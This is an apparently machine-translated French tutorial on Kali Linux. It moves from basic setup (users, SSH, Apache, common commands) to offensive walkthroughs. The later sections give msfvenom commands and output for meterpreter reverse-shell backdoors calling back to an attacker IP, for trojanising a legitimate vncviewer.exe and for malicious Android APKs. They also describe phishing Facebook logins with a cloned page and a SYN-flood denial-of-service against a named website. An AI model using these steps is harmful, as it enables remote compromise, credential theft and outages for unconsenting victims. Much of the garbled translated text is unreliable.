Pourquoi tu devrais utiliser Kali Linux?
Kali Linux est principalement utilisé par les testeurs de pénétration, les auditeurs de sécurité, les enquêteurs et les chercheurs en médecine légale. Il a presque tous les outils ou scripts préinstallés qui peuvent être utilisés à l'une des fins ci-dessus. Vous pouvez utiliser Kali Linux pour casser les réseaux WiFi, pour exécuter Open Source Intelligence (OSINT) sur quelqu'un, pour pirater des sites Web et des réseaux et bien d'autres.
Autre que le piratage éthique, Kali Linux a également un ensemble d'outils d'investigation médico-légale. La criminalistique est une autre branche de sécurité importante et émergente dont le but principal est de collecter et d'analyser les preuves d'une activité criminelle, puis de revenir en arrière. L'enquête médico-légale aide à retracer et à éliminer les effets malveillants (bordeaux, malwares) résultant d'une activité criminelle et calculant / manipulant la perte après une cyberattaque. Kali Linux propose un mode furtif distinct pour les opérations de «criminalistique» dans lesquelles il ne laisse aucune empreinte digitale sur le système de l'hôte.
Se mettre à l'aise avec l'environnement de Kali
Kali n'est pas conçu pour les utilisateurs ordinaires et ce n'est pas très convivial comme Windows ou Ubuntu. Son environnement par défaut est Root, ce qui n'est pas très facile à utiliser et est assez dangereux pour les noobs. Il manque également certains services publics de base comme Snap, VirtualBox et d'autres utilitaires utiles qui sont présents dans Ubuntu.
Commençons par le commencement
La première chose à faire est de faire un utilisateur non root
root @ kali: ~ # AddUser Kali
Ajout de l'utilisateur «Kali»…
Ajout d'un nouveau groupe «Kali» (1002)…
Ajout d'un nouvel utilisateur «Kali» (1002) avec le groupe «Kali»…
Création du répertoire de la maison '/ home / kali'…
Copie de fichiers à partir de '/ etc / skel'…
Nouveau mot de passe:
… Snip…
root @ kali: ~ # usermod -ag sudo kali
Initialiser la base de données PostgreSQL de Metasploit Framework
root @ kali: ~ # msfdb init
Création de l'utilisateur de la base de données «MSF»
Entrez le mot de passe pour un nouveau rôle:
Entrez à nouveau:
Création de bases de données «MSF» et «msf_test»
… Snip…
Ajoutez les lignes suivantes à vos sources «/ etc / apt /.Fichier de liste
deb http: // http.kali.org / kali kali-rolling principal contribute non libre
# Pour l'accès aux packages source, décommentez la ligne suivante
# deb-src http: // http.kali.org / kali kali-rolling principal contribute non libre
Installez d'autres outils utiles.
root @ kali: ~ # APT-Get Update && apt mise à niveau -y
root @ kali: ~ # apt-get installer virtualbox virtualbox-dkms gobuster tor tor-browser
openvpn htop atom deepin-terminal Tilix -y
Gérer les services par défaut de Kali
Kali est livré avec de nombreux services non standard préinstallés tels que PostgreSQL, MySQL, SSH, HTTP. S'ils ne sont pas configurés correctement, ces services commenceront comme un processus de fond lorsque votre Kali Linux s'oppose et ces ports ouverts peuvent être une menace pour la sécurité de votre système.
Dans cette section, nous examinerons comment ces services fonctionnent et comment vous pouvez les configurer correctement et comment vous pouvez les utiliser. La façon standard de configurer un outil ou un service est lu son fichier ReadMe Doc. Le fichier ReadMe contient la procédure standard pour configurer et utiliser un outil ou un service. Les fichiers ReadMe sont généralement situés dans le dossier «/ usr / share / doc / [tool_name] / readme».
Secure Shell Service (SSH)
Secure Shell (SSH) est utilisé depuis longtemps comme outil standard pour exécuter à distance des commandes, des fichiers de transfert et d'autres fins d'administration à distance. Le package comprend SSH (client) et SSHD (service) pour contrôler d'autres machines à distance.
Le service SSH n'est pas démarré par défaut lorsque Kali est enracinée, vous pouvez le démarrer en tapant,
root @ kali: ~ $ service ssh start
root @ kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0: * Écoutez 6601 / sshd
TCP6 0 0 ::: 22 ::: * Écoutez 6601 / sshd
Si vous voulez que SSHD commence à chaque fois que votre kali est. Taper
root @ kali: ~ $ update-rc.d ssh activer
Si vous voulez que quelqu'un se connecte à votre PC via SSH, il utilisera le nom d'utilisateur et le mot de passe de votre Kali pour l'authentification de la connexion. Il vaut donc mieux changer votre mot de passe par défaut «TOOR» en quelque chose de sécurisé.
root @ kali: ~ $ passwd
Modification du mot de passe pour root.
Mot de passe actuel:
Nouveau mot de passe:
Re-taper le nouveau mot de passe:
passwd: mot de passe mis à jour avec succès
Maintenant, recharger le service SSH pour affecter les changements
root @ kali: ~ $ service ssh rechargement
Service http
Le service HTTP est très bénéfique tout en effectuant des tâches liées au piratage éthique. Il peut être utilisé pour héberger de fausses pages Web de phishing et un site Web, pour transférer des fichiers vers des serveurs de victimes à distance. Les applications Web devenant de plus en plus populaires chaque jour, il est maintenant plus important d'avoir des connaissances pour comprendre et utiliser des serveurs HTTP comme Apache.
Apache est un serveur HTTP qui est préinstallé à Kali. Le service HTTP d'Apache est désactivé par défaut, mais vous pouvez le démarrer à l'aide de la commande suivante.
root @ kali: ~ $ service apache2 start
Apache hébergera sa page Web Debian par défaut sur votre domaine local au port http standard 80. Aller sur http: // localhost: 80 /
Pour le démarrer à chaque fois que votre kali commence, tapez
root @ kali: ~ $ update-rc.d apache2 activer
Vous pouvez également configurer Apache sur le port non standard en modifiant son fichier de configuration (/ etc / apache2 / ports.conf)
root @ kali: ~ $ nano / etc / apache2 / ports.confli
Enregistrez le fichier puis exécutez
root @ kali: ~ $ service apache2 redémarrer
Maintenant, Apache sera serveur sur le port «1234» au lieu du port standard 80.
Si vous souhaitez lire la documentation complète d'Apache Server, accédez au répertoire «/ usr / share / doc / apache2 /», tapez
root @ kali: ~ $ cd / usr / share / doc / apache2 /
root @ kali: / usr / share / doc / apache2 $ gzip --décompression readme.Debian.gz
root @ kali: / usr / share / doc / apache2 $ nano readme.Debian
Une liste de quelques commandes utiles
Localiser est utilisé pour localiser un fichier dans Linux, avant d'utiliser cette commande, vous devez d'abord mettre à jour votre base de données
root @ kali: ~ # updatedb
root @ kali: ~ # localiser uqjhssvf.jpeg
/ root / uqjhssvf.jpeg
trouver est plus agressif et ne compte pas sur la base de données. Il recherche récursivement le fichier dans le répertoire donné et ses sous-répertoires.
root @ kali: ~ # trouver ./ -Name Main.py
./ Desktop / Main.py
wget peut être utilisé pour télécharger une page Web ou un fichier dans le terminal.
root @ kali: ~ # wget tinytuba.com
--2019-05-11 08: 58: 48-- http: // tinytuba.com /
Résolution de Tinytuba.com (tinytuba.com)… 52.216.129.66
Connexion à Tinytuba.com (tinytuba.com) | 52.216.129.66 |: 80… connecté.
Demande HTTP envoyée, en attente de réponse… 200 ok
Longueur: 1551 (1.5k) [Texte / HTML]
Économie vers: 'Index.html '
indice.HTML 100% [=========================>] 1.51k --.-Kb / s en 0
2019-05-11 08:58:50 (56.5 Mo / s) - 'Index.HTML 'enregistré [1551/1551]
root @ kali: ~ # index firefox.html
haut Vous donne des informations sur votre processeur, votre utilisation de la mémoire et d'autres statistiques.
histoire Affichez la liste des commandes précédentes que vous avez entrées dans votre terminal.
Certaines autres commandes utiles que vous pouvez trouver sur Internet sont LS, RM, RMDIR, ADDUSER, DUTER, SERVICE, NANO, CAT, MORE, Moins, uname, Whoami etc
Générer des dérives malveillantes
Vous pouvez générer des binaires EXE malveillants en utilisant «MSFvenom» Kali Linux et l'installer sur le système de quelqu'un d'autre pour le contrôler à distance.
root @ kali: ~ $ msfvenom -a x86 --platform windows -b '\ x00' -p windows / meterpreter / reverse_tcp
LHOST = [Adresse IP de l'attaquant] lport = [Port de l'attaquant NO] -F EXE> FUN.exe
Trouvé 11 encodeurs compatibles
Tenter de coder la charge utile avec 1 itérations de x86 / shikata_ga_nai
x86 / shikata_ga_nai a réussi avec la taille 368 (itération = 0)
x86 / shikata_ga_nai choisi avec la taille finale 368
Taille de la charge utile: 368 octets
Taille finale du fichier EXE: 73802 octets
root @ kali: ~ $ ls amusant.exe
amusant.exe
root @ kali: ~ $ file fun.exe
amusant.EXE: PE32 EXECTIVATION (GUI) Intel 80386, pour MS Windows
Pour générer une porte dérobée pour X64 Architecture Windows Systems, saisissez la commande suivante.
root @ kali: ~ $ msfvenom - Platform Windows -b '\ x00' -p windows / x64 / meterpreter / reverse_tcp
LHOST = [Adresse IP de l'attaquant] lport = [Port de l'attaquant NO] -F EXE> FUN.exe
[-] Aucune arche sélectionnée, sélectionnant Arch: x64 dans la charge utile
Trouvé 3 encodeurs compatibles
… Snip…
root @ kali: ~ $ file fun.exe
amusant.EXE: PE32 + exécutable (GUI) x86-64, pour MS Windows
Incorporer les délais dans des applications légitimes en utilisant Kali
Vous pouvez également intégrer votre code de porte dérobée malveillant dans un fichier EXE inoffensif comme Adobe Reader Installer ou un exécutable de lecteur multimédia. L'exécutable occupant une résistance à la recherche ressemblera à une application logicielle légitime, mais lorsqu'elle est exécutée sur l'ordinateur de la victime, il exécutera votre porte dérobée malveillante à côté de cette application légitime, entraînant un compromis de la victime du PC de la victime.
Il existe des Windows exécutables déjà présents dans Kali Linux, que nous utiliserons pour démontrer.
root @ kali: ~ $ ls / usr / share / windows-binaires /
BATES DE LA.exe fport / klogger.exe nbtenum / plink.exe vncviewer.exe whoami.exe
Enumplus / Fgdump / Hyperion / Mbenum / NC.radmin exe.exe wget.exe
Nous injecterons notre charge utile dans «vncviewer.EXE »EXECTABLE.
root @ kali: ~ $ msfvenom -a x86 --platform windows -x / usr / share / windows-binaries / vncviewer.exe
-K -p Windows / MeterPreter / Reverse_Tcp Lhost = [IP de l'attaquant] lport = [Port de l'attaquant]
-e x86 / shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Trouvé 1 encodeurs compatibles
Tenter de coder la charge utile avec 3 itérations de x86 / shikata_ga_nai
… Snip…
Taille de la charge utile: 422 octets
Taille finale du fichier EXE: 421376 octets
Enregistré comme: vncviewer.exe
Génération de baignoires Android
Pour contrôler à distance les téléphones Android, vous pouvez générer des fichiers APK malveillants à l'aide de MSFvenom.
root @ kali: ~ $ msfvenom -p android / meterpreter / reverse_tcp lhost = [IP d'attaquant]
LPPORT = [Port de l'attaquant no] r>.apk
[-] Aucune plate-forme n'a été sélectionnée, en choisissant MSF :: Module :: Platform :: Android à partir de la charge utile
[-] Pas d'arc sélectionné, sélectionnant Arch: Dalvik dans la charge utile
Aucun encodeur ou badchars spécifié, sortie de la charge utile brute
Taille de la charge utile: 10087 octets
Ingénierie sociale utilisant Setoolkit
L'ingénierie sociale est l'utilisation de la tromperie pour inciter quelqu'un à révéler ses informations confidentielles ou personnelles qui peuvent être mal utilisées à des fins malveillantes.
La technique de l'ingénierie sociale la plus couramment utilisée est le phishing, dans lequel vous essayez d'envoyer des messages, des e-mails ou des appels téléphoniques pour obtenir des informations personnelles, en particulier les informations liées à l'argent. Dans Phishing Attack, le récepteur d'un e-mail est convaincu qu'il a reçu l'e-mail d'une véritable source telle qu'une banque ou un département du gouvernement, puis a trompé ses informations d'identification sensibles.
Dans cette démonstration, nous allons cloner une page de connexion Facebook à l'aide de Setoolkit et héberger cette page sur notre serveur HTTP, puis nous enverrons l'adresse IP de notre serveur HTTP à la victime. Lorsque la victime se connecte à notre fausse page de connexion Facebook, cette page enverra son nom d'utilisateur et son mot de passe à notre machine Kali.
Taper seroolkit Dans le terminal, Setoolkit sera ouvert
Lorsque la victime entre dans notre adresse IP dans son navigateur, il sera présenté avec notre fausse page de connexion Facebook que nous avons créée plus tôt. Nous devons attendre que la victime entre son nom d'utilisateur et son mot de passe dans notre page clonée. La fausse page Facebook ressemblera à ceci,
Tant que l'utilisateur entre ses informations d'identification, Setoolkit les affichera sur le terminal.
Cette démo était sur un réseau local, si vous voulez le faire sur une adresse IP publique, vous devez soit effectuer un transfert de port sur votre routeur, soit utiliser Ngrok pour la propriété intellectuelle et le numéro de port publique.
Attaque du déni de service (DOS) à l'aide de métasploit
L'attaque du déni de service (DOS) est un type d'attaque sur un système ou un réseau qui diminue ou restreint l'accessibilité des ressources système à ses utilisateurs légitimes. Le but d'une attaque DOS n'est pas de voler des informations sensibles, l'attaquant essaie plutôt d'inonder le système de victime avec des demandes de service non légitimes pour surcharger ses ressources.
Une attaque de déni de service distribué (DDOS) a besoin d'un grand nombre de systèmes (appelés zombies) attaquant une seule cible, entraînant un déni de service. Une seule attaque DOS ne peut pas affecter les grandes entreprises et les réseaux, c'est pourquoi DDOS est plus efficace et mortel. Il est également difficile de retracer et de bloquer l'attaque DDOS car des centaines et des milliers de systèmes de zombies attaquent un seul hôte.
Ce sont de nombreux outils et scripts disponibles pour les attaques DOS et DDOS, mais nous utiliserons un module auxiliaire de métasploit pour la démonstration. Nous essaierons de supprimer un exemple de site Web «www.jarusa.com ».
Tout d'abord, allez sur https: // www.isitdownrightnow.com / et confirmer que le site Web est opérationnel
Le site Web est en place. Maintenant, ouvrez la console du cadre Metasploit dans votre terminal.
root @ kali: ~ $ msfconsole
… Snip…
MSF5> Utilisez les axuaires / dos / TCP / Synflood
Découvrir www.jarusa.comAdresse IP et définissez-la comme rhost, puis exécutez l'attaque
Après un certain temps, vous verrez que le site Web n'est pas disponible. Confirmez-le en utilisant https: // www.isitdownrightnow.com /
Kali Linux est une maison pour les pirates éthiques et ce tutoriel vous a, espérons-le, vous a éclairé les bases de Kali Linux, ce qu'elle peut faire et comment commencer avec son utilisation.